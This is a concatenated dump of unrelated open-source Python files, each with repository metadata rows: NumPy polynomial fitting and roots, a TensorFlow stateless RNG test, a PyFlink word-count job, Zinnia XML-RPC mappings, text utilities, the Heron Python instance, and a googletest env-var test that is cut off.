If some of the singular values of `V` are so small that they are
neglected (and `full` == ``False``), a `RankWarning` will be raised.
This means that the coefficient values may be poorly determined.
Fitting to a lower order polynomial will usually get rid of the warning
(but may not be what you want, of course; if you have independent
reason(s) for choosing the degree which isn't working, you may have to:
a) reconsider those reasons, and/or b) reconsider the quality of your
data). The `rcond` parameter can also be set to a value smaller than
its default, but the resulting fit may be spurious and have large
contributions from roundoff error.
Polynomial fits using double precision tend to "fail" at about
(polynomial) degree 20. Fits using Chebyshev or Legendre series are
generally better conditioned, but much can still depend on the
distribution of the sample points and the smoothness of the data. If
the quality of the fit is inadequate, splines may be a good
alternative.
Examples
--------
>>> from numpy import polynomial as P
>>> x = np.linspace(-1,1,51) # x "data": [-1, -0.96, ..., 0.96, 1]
>>> y = x**3 - x + np.random.randn(len(x)) # x^3 - x + N(0,1) "noise"
>>> c, stats = P.polyfit(x,y,3,full=True)
>>> c # c[0], c[2] should be approx. 0, c[1] approx. -1, c[3] approx. 1
array([ 0.01909725, -1.30598256, -0.00577963, 1.02644286])
>>> stats # note the large SSR, explaining the rather poor results
[array([ 38.06116253]), 4, array([ 1.38446749, 1.32119158, 0.50443316,
0.28853036]), 1.1324274851176597e-014]
Same thing without the added noise
>>> y = x**3 - x
>>> c, stats = P.polyfit(x,y,3,full=True)
>>> c # c[0], c[2] should be "very close to 0", c[1] ~= -1, c[3] ~= 1
array([ -1.73362882e-17, -1.00000000e+00, -2.67471909e-16,
1.00000000e+00])
>>> stats # note the minuscule SSR
[array([ 7.46346754e-31]), 4, array([ 1.38446749, 1.32119158,
0.50443316, 0.28853036]), 1.1324274851176597e-014]
"""
order = int(deg) + 1
x = np.asarray(x) + 0.0
y = np.asarray(y) + 0.0
# check arguments.
if deg < 0 :
raise ValueError("expected deg >= 0")
if x.ndim != 1:
raise TypeError("expected 1D vector for x")
if x.size == 0:
raise TypeError("expected non-empty vector for x")
if y.ndim < 1 or y.ndim > 2 :
raise TypeError("expected 1D or 2D array for y")
if len(x) != len(y):
raise TypeError("expected x and y to have same length")
# set up the least squares matrices in transposed form
lhs = polyvander(x, deg).T
rhs = y.T
if w is not None:
w = np.asarray(w) + 0.0
if w.ndim != 1:
raise TypeError("expected 1D vector for w")
if len(x) != len(w):
raise TypeError("expected x and w to have same length")
# apply weights. Don't use inplace operations as they
# can cause problems with NA.
lhs = lhs * w
rhs = rhs * w
# set rcond
if rcond is None :
rcond = len(x)*np.finfo(x.dtype).eps
# Determine the norms of the design matrix columns.
if issubclass(lhs.dtype.type, np.complexfloating):
scl = np.sqrt((np.square(lhs.real) + np.square(lhs.imag)).sum(1))
else:
scl = np.sqrt(np.square(lhs).sum(1))
scl[scl == 0] = 1
# Solve the least squares problem.
c, resids, rank, s = la.lstsq(lhs.T/scl, rhs.T, rcond)
c = (c.T/scl).T
# warn on rank reduction
if rank != order and not full:
msg = "The fit may be poorly conditioned"
warnings.warn(msg, pu.RankWarning)
if full :
return c, [resids, rank, s, rcond]
else :
return c
def polycompanion(c):
"""
Return the companion matrix of c.
The companion matrix for power series cannot be made symmetric by
scaling the basis, so this function differs from those for the
orthogonal polynomials.
Parameters
----------
c : array_like
1-D array of polynomial coefficients ordered from low to high
degree.
Returns
-------
mat : ndarray
Companion matrix of dimensions (deg, deg).
Notes
-----
.. versionadded:: 1.7.0
"""
# c is a trimmed copy
[c] = pu.as_series([c])
if len(c) < 2 :
raise ValueError('Series must have maximum degree of at least 1.')
if len(c) == 2:
return np.array([[-c[0]/c[1]]])
n = len(c) - 1
mat = np.zeros((n, n), dtype=c.dtype)
bot = mat.reshape(-1)[n::n+1]
bot[...] = 1
mat[:, -1] -= c[:-1]/c[-1]
return mat
def polyroots(c):
"""
Compute the roots of a polynomial.
Return the roots (a.k.a. "zeros") of the polynomial
.. math:: p(x) = \\sum_i c[i] * x^i.
Parameters
----------
c : 1-D array_like
1-D array of polynomial coefficients.
Returns
-------
out : ndarray
Array of the roots of the polynomial. If all the roots are real,
then `out` is also real, otherwise it is complex.
See Also
--------
chebroots
Notes
-----
The root estimates are obtained as the eigenvalues of the companion
matrix, Roots far from the origin of the complex plane may have large
errors due to the numerical instability of the power series for such
values. Roots with multiplicity greater than 1 will also show larger
errors as the value of the series near such points is relatively
insensitive to errors in the roots. Isolated roots near the origin can
be improved by a few iterations of Newton's method.
Examples
--------
>>> import numpy.polynomial.polynomial as poly
>>> poly.polyroots(poly.polyfromroots((-1,0,1)))
array([-1., 0., 1.])
>>> poly.polyroots(poly.polyfromroots((-1,0,1))).dtype
dtype('float64')
>>> j = complex(0,1)
>>> poly.polyroots(poly.polyfromroots((-j,0,j)))
array([ 0.00000000e+00+0.j, 0.00000000e+00+1.j, 2.77555756e-17-1.j])
"""
# c is a trimmed copy
[c] = pu.as_series([c])
if len(c) < 2:
return np.array([], dtype=c.dtype)
if len(c) == 2:
return np.array([-c[0]/c[1]])
m = polycompanion(c)
r = la.eigvals(m)
r.sort()
return r
#
# polynomial class
#
exec(polytemplate.substitute(name='Polynomial', nick='poly', domain='[-1,1]'))
| gpl-2.0 | 4,744,763,754,743,930,000 | 30.54923 | 79 | 0.590833 | false |
ville-k/tensorflow | tensorflow/contrib/stateless/python/kernel_tests/stateless_random_ops_test.py | 54 | 3287 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for stateless random ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib import stateless
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.platform import test
CASES = [(stateless.stateless_random_uniform, random_ops.random_uniform),
(stateless.stateless_random_normal, random_ops.random_normal),
(stateless.stateless_truncated_normal, random_ops.truncated_normal)]
def invert_philox(key, value):
"""Invert the Philox bijection."""
key = np.array(key, dtype=np.uint32)
value = np.array(value, dtype=np.uint32)
step = np.array([0x9E3779B9, 0xBB67AE85], dtype=np.uint32)
for n in range(10)[::-1]:
key0, key1 = key + n * step
v0 = value[3] * 0x991a7cdb & 0xffffffff
v2 = value[1] * 0x6d7cae67 & 0xffffffff
hi0 = v0 * 0xD2511F53 >> 32
hi1 = v2 * 0xCD9E8D57 >> 32
v1 = hi1 ^ value[0] ^ key0
v3 = hi0 ^ value[2] ^ key1
value = v0, v1, v2, v3
return np.array(value)
class StatelessOpsTest(test.TestCase):
def testMatchStateful(self):
# Stateless ops should be the same as stateful ops on the first call
# after seed scrambling.
key = 0x3ec8f720, 0x02461e29
for seed in (7, 17), (11, 5), (2, 3):
preseed = invert_philox(key, (seed[0], 0, seed[1], 0)).astype(np.uint64)
preseed = preseed[::2] | preseed[1::2] << 32
random_seed.set_random_seed(seed[0])
with self.test_session(use_gpu=True):
for stateless_op, stateful_op in CASES:
for shape in (), (3,), (2, 5):
stateful = stateful_op(shape, seed=seed[1])
pure = stateless_op(shape, seed=preseed)
self.assertAllEqual(stateful.eval(), pure.eval())
def testDeterminism(self):
# Stateless values should be equal iff the seeds are equal (roughly)
with self.test_session(use_gpu=True):
seed_t = array_ops.placeholder(dtypes.int64, shape=[2])
seeds = [(x, y) for x in range(5) for y in range(5)] * 3
for stateless_op, _ in CASES:
for shape in (), (3,), (2, 5):
pure = stateless_op(shape, seed=seed_t)
values = [(seed, pure.eval(feed_dict={seed_t: seed}))
for seed in seeds]
for s0, v0 in values:
for s1, v1 in values:
self.assertEqual(s0 == s1, np.all(v0 == v1))
if __name__ == '__main__':
test.main()
| apache-2.0 | 7,203,800,734,959,563,000 | 38.130952 | 80 | 0.648312 | false |
tony810430/flink | flink-end-to-end-tests/flink-python-test/python/python_job.py | 2 | 3480 | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import logging
import os
import shutil
import sys
import tempfile
from pyflink.table import EnvironmentSettings, TableEnvironment
def word_count():
content = "line Licensed to the Apache Software Foundation ASF under one " \
"line or more contributor license agreements See the NOTICE file " \
"line distributed with this work for additional information " \
"line regarding copyright ownership The ASF licenses this file " \
"to you under the Apache License Version the " \
"License you may not use this file except in compliance " \
"with the License"
env_settings = EnvironmentSettings.new_instance().in_batch_mode().use_blink_planner().build()
t_env = TableEnvironment.create(environment_settings=env_settings)
# used to test pipeline.jars and pipleline.classpaths
config_key = sys.argv[1]
config_value = sys.argv[2]
t_env.get_config().get_configuration().set_string(config_key, config_value)
# register Results table in table environment
tmp_dir = tempfile.gettempdir()
result_path = tmp_dir + '/result'
if os.path.exists(result_path):
try:
if os.path.isfile(result_path):
os.remove(result_path)
else:
shutil.rmtree(result_path)
except OSError as e:
logging.error("Error removing directory: %s - %s.", e.filename, e.strerror)
logging.info("Results directory: %s", result_path)
sink_ddl = """
create table Results(
word VARCHAR,
`count` BIGINT,
`count_java` BIGINT
) with (
'connector.type' = 'filesystem',
'format.type' = 'csv',
'connector.path' = '{}'
)
""".format(result_path)
t_env.execute_sql(sink_ddl)
t_env.execute_sql("create temporary system function add_one as 'add_one.add_one' language python")
t_env.register_java_function("add_one_java", "org.apache.flink.python.tests.util.AddOne")
elements = [(word, 0) for word in content.split(" ")]
t_env.from_elements(elements, ["word", "count"]) \
.select("word, add_one(count) as count, add_one_java(count) as count_java") \
.group_by("word") \
.select("word, count(count) as count, count(count_java) as count_java") \
.execute_insert("Results")
if __name__ == '__main__':
logging.basicConfig(stream=sys.stdout, level=logging.INFO, format="%(message)s")
word_count()
| apache-2.0 | 874,255,062,469,409,500 | 39.941176 | 102 | 0.626724 | false |
lu18887/perhapsgeekblog | perhapsgeek/zinnia/xmlrpc/__init__.py | 14 | 1235 | """XML-RPC methods for Zinnia"""
ZINNIA_XMLRPC_PINGBACK = [
('zinnia.xmlrpc.pingback.pingback_ping',
'pingback.ping'),
('zinnia.xmlrpc.pingback.pingback_extensions_get_pingbacks',
'pingback.extensions.getPingbacks')]
ZINNIA_XMLRPC_METAWEBLOG = [
('zinnia.xmlrpc.metaweblog.get_users_blogs',
'blogger.getUsersBlogs'),
('zinnia.xmlrpc.metaweblog.get_user_info',
'blogger.getUserInfo'),
('zinnia.xmlrpc.metaweblog.delete_post',
'blogger.deletePost'),
('zinnia.xmlrpc.metaweblog.get_authors',
'wp.getAuthors'),
('zinnia.xmlrpc.metaweblog.get_tags',
'wp.getTags'),
('zinnia.xmlrpc.metaweblog.get_categories',
'metaWeblog.getCategories'),
('zinnia.xmlrpc.metaweblog.new_category',
'wp.newCategory'),
('zinnia.xmlrpc.metaweblog.get_recent_posts',
'metaWeblog.getRecentPosts'),
('zinnia.xmlrpc.metaweblog.get_post',
'metaWeblog.getPost'),
('zinnia.xmlrpc.metaweblog.new_post',
'metaWeblog.newPost'),
('zinnia.xmlrpc.metaweblog.edit_post',
'metaWeblog.editPost'),
('zinnia.xmlrpc.metaweblog.new_media_object',
'metaWeblog.newMediaObject')]
ZINNIA_XMLRPC_METHODS = ZINNIA_XMLRPC_PINGBACK + ZINNIA_XMLRPC_METAWEBLOG
| mit | 6,761,041,865,636,405,000 | 33.305556 | 73 | 0.688259 | false |
zhiyanfoo/crunch-shake | crunch-shake/utils.py | 2 | 1649 | import json
import re
from collections import namedtuple
import string
# INPUT OUTPUT
def file_to_list(path):
with open(path, 'r') as inputFile:
return inputFile.readlines()
def json_file_to_dict(path):
with open(path, 'r') as jsonFile:
return json.load(jsonFile)
def to_json(x, path):
with open(path, 'w') as jsonFile:
json.dump(x, jsonFile)
def list_to_file(li, path):
with open(path, 'w') as outputFile:
outputFile.writelines(li)
def str_to_file(x, path):
with open(path, 'w') as outputFile:
outputFile.write(x)
# MATCHERS
def get_title(raw_play_lines):
pattern = re.compile("<title>(.*): Entire Play.*")
for line in raw_play_lines:
match = pattern.search(line)
if match:
return match.group(1)
raise ValueError
def get_matcher(words, identifier):
joined_words = "|".join(words)
pattern = "(?P<{0}>".format(identifier) + joined_words + ")"
matcher = re.compile(
pattern,
re.IGNORECASE)
return matcher
Matcher = namedtuple('Matcher', ['dialogue', 'character', 'stage_direction',
'instruction', 'act', 'scene'])
# HELPERS
def invert_dict(front_dict):
""" Take a dict of key->values and return values->[keys] """
back_dict = { value : [] for value in front_dict.values() }
for key, value in front_dict.items():
back_dict[value].append(key)
return back_dict
def create_remove_punctuation():
remove_punct_map = dict.fromkeys(map(ord, string.punctuation))
def remove_punctuation(line):
return line.translate(remove_punct_map)
return remove_punctuation
| mit | -944,120,410,777,327,200 | 25.596774 | 76 | 0.639782 | false |
huijunwu/heron | heron/instance/src/python/instance/st_heron_instance.py | 5 | 17184 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''module for single-thread Heron Instance in python'''
import argparse
import collections
import logging
import os
import resource
import traceback
import signal
import yaml
import heronpy.api.api_constants as api_constants
from heronpy.api.state.state import HashMapState
from heron.common.src.python.utils import log
from heron.proto import physical_plan_pb2, tuple_pb2, ckptmgr_pb2, common_pb2
from heron.instance.src.python.utils.misc import HeronCommunicator
from heron.instance.src.python.utils.misc import SerializerHelper
from heron.instance.src.python.utils.misc import PhysicalPlanHelper
from heron.instance.src.python.utils.metrics import GatewayMetrics, PyMetrics, MetricsCollector
from heron.instance.src.python.network import MetricsManagerClient, SingleThreadStmgrClient
from heron.instance.src.python.network import create_socket_options
from heron.instance.src.python.network import GatewayLooper
from heron.instance.src.python.basics import SpoutInstance, BoltInstance
import heron.instance.src.python.utils.system_constants as constants
from heron.instance.src.python.utils import system_config
Log = log.Log
AssignedInstance = collections.namedtuple('AssignedInstance', 'is_spout, protobuf, py_class')
def set_resource_limit(max_ram):
resource.setrlimit(resource.RLIMIT_RSS, (max_ram, max_ram))
# pylint: disable=too-many-instance-attributes
class SingleThreadHeronInstance(object):
"""SingleThreadHeronInstance is an implementation of Heron Instance in python"""
STREAM_MGR_HOST = "127.0.0.1"
METRICS_MGR_HOST = "127.0.0.1"
def __init__(self, topology_name, topology_id, instance,
stream_port, metrics_port, topo_pex_file_path):
# Basic information about this heron instance
self.topology_name = topology_name
self.topology_id = topology_id
self.instance = instance
self.stream_port = stream_port
self.metrics_port = metrics_port
self.topo_pex_file_abs_path = os.path.abspath(topo_pex_file_path)
self.sys_config = system_config.get_sys_config()
self.in_stream = HeronCommunicator(producer_cb=None, consumer_cb=None)
self.out_stream = HeronCommunicator(producer_cb=None, consumer_cb=None)
self.socket_map = dict()
self.looper = GatewayLooper(self.socket_map)
# Initialize metrics related
self.out_metrics = HeronCommunicator()
self.out_metrics.\
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_METRICS_WRITE_QUEUE_CAPACITY])
self.metrics_collector = MetricsCollector(self.looper, self.out_metrics)
self.gateway_metrics = GatewayMetrics(self.metrics_collector)
self.py_metrics = PyMetrics(self.metrics_collector)
# Create socket options and socket clients
socket_options = create_socket_options()
self._stmgr_client = \
SingleThreadStmgrClient(self.looper, self, self.STREAM_MGR_HOST, stream_port,
topology_name, topology_id, instance, self.socket_map,
self.gateway_metrics, socket_options)
self._metrics_client = \
MetricsManagerClient(self.looper, self.METRICS_MGR_HOST, metrics_port, instance,
self.out_metrics, self.in_stream, self.out_stream,
self.socket_map, socket_options, self.gateway_metrics, self.py_metrics)
self.my_pplan_helper = None
self.serializer = None
# my_instance is a AssignedInstance tuple
self.my_instance = None
self.is_instance_started = False
self.is_stateful_started = False
self.stateful_state = None
# Debugging purposes
def go_trace(_, stack):
with open("/tmp/trace.log", "w") as f:
traceback.print_stack(stack, file=f)
self.looper.register_timer_task_in_sec(self.looper.exit_loop, 0.0)
signal.signal(signal.SIGUSR1, go_trace)
def start(self):
self._stmgr_client.start_connect()
self._metrics_client.start_connect()
# call send_buffered_messages every time it is waken up
self.looper.add_wakeup_task(self.send_buffered_messages)
self.looper.loop()
def handle_new_tuple_set_2(self, hts2):
"""Called when new HeronTupleSet2 arrives
Convert(Assemble) HeronTupleSet2(raw byte array) to HeronTupleSet
See more at GitHub PR #1421
:param tuple_msg_set: HeronTupleSet2 type
"""
if self.my_pplan_helper is None or self.my_instance is None:
Log.error("Got tuple set when no instance assigned yet")
else:
hts = tuple_pb2.HeronTupleSet()
if hts2.HasField('control'):
hts.control.CopyFrom(hts2.control)
else:
hdts = tuple_pb2.HeronDataTupleSet()
hdts.stream.CopyFrom(hts2.data.stream)
try:
for trunk in hts2.data.tuples:
added_tuple = hdts.tuples.add()
added_tuple.ParseFromString(trunk)
except Exception:
Log.exception('Fail to deserialize HeronDataTuple')
hts.data.CopyFrom(hdts)
self.in_stream.offer(hts)
if self.my_pplan_helper.is_topology_running():
self.my_instance.py_class.process_incoming_tuples()
def handle_initiate_stateful_checkpoint(self, ckptmsg):
"""Called when we get InitiateStatefulCheckpoint message
:param ckptmsg: InitiateStatefulCheckpoint type
"""
self.in_stream.offer(ckptmsg)
if self.my_pplan_helper.is_topology_running():
self.my_instance.py_class.process_incoming_tuples()
def handle_start_stateful_processing(self, start_msg):
"""Called when we receive StartInstanceStatefulProcessing message
:param start_msg: StartInstanceStatefulProcessing type
"""
Log.info("Received start stateful processing for %s" % start_msg.checkpoint_id)
self.is_stateful_started = True
self.start_instance_if_possible()
def handle_restore_instance_state(self, restore_msg):
"""Called when we receive RestoreInstanceStateRequest message
:param restore_msg: RestoreInstanceStateRequest type
"""
Log.info("Restoring instance state to checkpoint %s" % restore_msg.state.checkpoint_id)
# Stop the instance
if self.is_stateful_started:
self.my_instance.py_class.stop()
self.my_instance.py_class.clear_collector()
self.is_stateful_started = False
# Clear all buffers
self.in_stream.clear()
self.out_stream.clear()
# Deser the state
if self.stateful_state is not None:
self.stateful_state.clear()
if restore_msg.state.state is not None and restore_msg.state.state:
try:
self.stateful_state = self.serializer.deserialize(restore_msg.state.state)
except Exception as e:
raise RuntimeError("Could not serialize state during restore " + str(e))
else:
Log.info("The restore request does not have an actual state")
if self.stateful_state is None:
self.stateful_state = HashMapState()
Log.info("Instance restore state deserialized")
# Send the response back
resp = ckptmgr_pb2.RestoreInstanceStateResponse()
resp.status.status = common_pb2.StatusCode.Value("OK")
resp.checkpoint_id = restore_msg.state.checkpoint_id
self._stmgr_client.send_message(resp)
def send_buffered_messages(self):
"""Send messages in out_stream to the Stream Manager"""
while not self.out_stream.is_empty() and self._stmgr_client.is_registered:
tuple_set = self.out_stream.poll()
if isinstance(tuple_set, tuple_pb2.HeronTupleSet):
tuple_set.src_task_id = self.my_pplan_helper.my_task_id
self.gateway_metrics.update_sent_packet(tuple_set.ByteSize())
self._stmgr_client.send_message(tuple_set)
def _handle_state_change_msg(self, new_helper):
"""Called when state change is commanded by stream manager"""
assert self.my_pplan_helper is not None
assert self.my_instance is not None and self.my_instance.py_class is not None
if self.my_pplan_helper.get_topology_state() != new_helper.get_topology_state():
# handle state change
# update the pplan_helper
self.my_pplan_helper = new_helper
if new_helper.is_topology_running():
if not self.is_instance_started:
self.start_instance_if_possible()
self.my_instance.py_class.invoke_activate()
elif new_helper.is_topology_paused():
self.my_instance.py_class.invoke_deactivate()
else:
raise RuntimeError("Unexpected TopologyState update: %s" % new_helper.get_topology_state())
else:
Log.info("Topology state remains the same.")
def handle_assignment_msg(self, pplan):
"""Called when new NewInstanceAssignmentMessage arrives
Tells this instance to become either spout/bolt.
:param pplan: PhysicalPlan proto
"""
new_helper = PhysicalPlanHelper(pplan, self.instance.instance_id,
self.topo_pex_file_abs_path)
if self.my_pplan_helper is not None and \
(self.my_pplan_helper.my_component_name != new_helper.my_component_name or
self.my_pplan_helper.my_task_id != new_helper.my_task_id):
raise RuntimeError("Our Assignment has changed. We will die to pick it.")
new_helper.set_topology_context(self.metrics_collector)
if self.my_pplan_helper is None:
Log.info("Received a new Physical Plan")
Log.info("Push the new pplan_helper to Heron Instance")
self._handle_assignment_msg(new_helper)
else:
Log.info("Received a new Physical Plan with the same assignment -- State Change")
Log.info("Old state: %s, new state: %s.",
self.my_pplan_helper.get_topology_state(), new_helper.get_topology_state())
self._handle_state_change_msg(new_helper)
def _handle_assignment_msg(self, pplan_helper):
self.my_pplan_helper = pplan_helper
self.serializer = SerializerHelper.get_serializer(self.my_pplan_helper.context)
if self.my_pplan_helper.is_spout:
# Starting a spout
my_spout = self.my_pplan_helper.get_my_spout()
Log.info("Incarnating ourselves as spout: %s with task id %s",
self.my_pplan_helper.my_component_name, str(self.my_pplan_helper.my_task_id))
self.in_stream. \
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_SPOUT_READ_QUEUE_CAPACITY])
self.out_stream. \
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_SPOUT_WRITE_QUEUE_CAPACITY])
py_spout_instance = SpoutInstance(self.my_pplan_helper, self.in_stream, self.out_stream,
self.looper)
self.my_instance = AssignedInstance(is_spout=True,
protobuf=my_spout,
py_class=py_spout_instance)
else:
# Starting a bolt
my_bolt = self.my_pplan_helper.get_my_bolt()
Log.info("Incarnating ourselves as bolt: %s with task id %s",
self.my_pplan_helper.my_component_name, str(self.my_pplan_helper.my_task_id))
self.in_stream. \
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_BOLT_READ_QUEUE_CAPACITY])
self.out_stream. \
register_capacity(self.sys_config[constants.INSTANCE_INTERNAL_BOLT_WRITE_QUEUE_CAPACITY])
py_bolt_instance = BoltInstance(self.my_pplan_helper, self.in_stream, self.out_stream,
self.looper)
self.my_instance = AssignedInstance(is_spout=False,
protobuf=my_bolt,
py_class=py_bolt_instance)
if self.my_pplan_helper.is_topology_running():
try:
self.start_instance_if_possible()
except Exception as e:
Log.error("Error with starting bolt/spout instance: " + str(e))
Log.error(traceback.format_exc())
else:
Log.info("The instance is deployed in deactivated state")
def start_instance_if_possible(self):
if self.my_pplan_helper is None:
return
if not self.my_pplan_helper.is_topology_running():
return
context = self.my_pplan_helper.context
mode = context.get_cluster_config().get(api_constants.TOPOLOGY_RELIABILITY_MODE,
api_constants.TopologyReliabilityMode.ATMOST_ONCE)
is_stateful = bool(mode == api_constants.TopologyReliabilityMode.EFFECTIVELY_ONCE)
if is_stateful and not self.is_stateful_started:
return
try:
Log.info("Starting bolt/spout instance now...")
self.my_instance.py_class.start(self.stateful_state)
self.is_instance_started = True
Log.info("Started instance successfully.")
except Exception as e:
Log.error(traceback.format_exc())
Log.error("Error when starting bolt/spout, bailing out...: %s", str(e))
self.looper.exit_loop()
def yaml_config_reader(config_path):
"""Reads yaml config file and returns auto-typed config_dict"""
if not config_path.endswith(".yaml"):
raise ValueError("Config file not yaml")
with open(config_path, 'r') as f:
config = yaml.load(f)
return config
# pylint: disable=missing-docstring
def main():
parser = argparse.ArgumentParser(description='Heron Python Instance')
parser.add_argument('--topology_name', required=True, help='Topology Name')
parser.add_argument('--topology_id', required=True, help='Topology Id')
parser.add_argument('--instance_id', required=True, help='Instance Id')
parser.add_argument('--component_name', required=True, help='Component Name')
parser.add_argument('--task_id', required=True, help='Task Id', type=int)
parser.add_argument('--component_index', required=True, help='Component Index', type=int)
parser.add_argument('--stmgr_id', required=True, help='StMgr Id')
parser.add_argument('--stmgr_port', required=True, help='StMgr Port', type=int)
parser.add_argument('--metricsmgr_port', required=True, help='MetricsMgr Port', type=int)
parser.add_argument('--sys_config', required=True, help='System Config File')
parser.add_argument('--override_config', required=True, help='Override Config File')
parser.add_argument('--topology_pex', required=True, help='Topology Pex File')
parser.add_argument('--max_ram', required=True, help='Maximum RAM to limit', type=int)
args = parser.parse_args()
sys_config = yaml_config_reader(args.sys_config)
override_config = yaml_config_reader(args.override_config)
system_config.set_sys_config(sys_config, override_config)
# get combined configuration
sys_config = system_config.get_sys_config()
# set resource limits
set_resource_limit(args.max_ram)
# create the protobuf instance
instance_info = physical_plan_pb2.InstanceInfo()
instance_info.task_id = args.task_id
instance_info.component_index = args.component_index
instance_info.component_name = args.component_name
instance = physical_plan_pb2.Instance()
instance.instance_id = args.instance_id
instance.stmgr_id = args.stmgr_id
instance.info.MergeFrom(instance_info)
# Logging init
log_dir = os.path.abspath(sys_config[constants.HERON_LOGGING_DIRECTORY])
max_log_files = sys_config[constants.HERON_LOGGING_MAXIMUM_FILES]
max_log_bytes = sys_config[constants.HERON_LOGGING_MAXIMUM_SIZE_MB] * constants.MB
log_file = os.path.join(log_dir, args.instance_id + ".log.0")
log.init_rotating_logger(level=logging.INFO, logfile=log_file,
max_files=max_log_files, max_bytes=max_log_bytes)
Log.info("\nStarting instance: " + args.instance_id + " for topology: " + args.topology_name +
" and topologyId: " + args.topology_id + " for component: " + args.component_name +
" with taskId: " + str(args.task_id) + " and componentIndex: " +
str(args.component_index) +
" and stmgrId: " + args.stmgr_id + " and stmgrPort: " + str(args.stmgr_port) +
" and metricsManagerPort: " + str(args.metricsmgr_port) +
"\n **Topology Pex file located at: " + args.topology_pex)
Log.debug("System config: " + str(sys_config))
Log.debug("Override config: " + str(override_config))
Log.debug("Maximum RAM: " + str(args.max_ram))
heron_instance = SingleThreadHeronInstance(args.topology_name, args.topology_id, instance,
args.stmgr_port, args.metricsmgr_port,
args.topology_pex)
heron_instance.start()
if __name__ == '__main__':
main()
| apache-2.0 | -3,452,371,859,321,656,300 | 42.503797 | 99 | 0.689828 | false |
skulbrane/googletest | test/gtest_env_var_test.py | 2408 | 3487 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test correctly parses environment variables."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import gtest_test_utils
IS_WINDOWS = os.name == 'nt'
IS_LINUX = os.name == 'posix' and os.uname()[0] == 'Linux'
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_env_var_test_')
environ = os.environ.copy()
def AssertEq(expected, actual):
if expected != actual:
print 'Expected: %s' % (expected,)
print ' Actual: %s' % (actual,)
raise AssertionError
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
environ[env_var] = value
elif env_var in environ:
del environ[env_var]
def GetFlag(flag):
"""Runs gtest_env_var_test_ and returns its output."""
args = [COMMAND]
if flag is not None:
args += [flag]
return gtest_test_utils.Subprocess(args, env=environ).output
def TestFlag(flag, test_val, default_val):
"""Verifies that the given flag is affected by the corresponding env var."""
env_var = 'GTEST_' + flag.upper()
SetEnvVar(env_var, test_val)
AssertEq(test_val, GetFlag(flag))
SetEnvVar(env_var, None)
AssertEq(default_val, GetFlag(flag))
class GTestEnvVarTest(gtest_test_utils.TestCase):
def testEnvVarAffectsFlag(self):
"""Tests that environment variable should affect the corresponding flag."""
TestFlag('break_on_failure', '1', '0')
TestFlag('color', 'yes', 'auto')
TestFlag('filter', 'FooTest.Bar', '*')
TestFlag('output', 'xml:tmp/foo.xml', '')
TestFlag('print_time', '0', '1')
TestFlag('repeat', '999', '1')
TestFlag('throw_on_failure', '1', '0')
TestFlag('death_test_style', 'threadsafe', 'fast')
TestFlag('catch_exceptions', '0', '1')
if IS_LINUX:
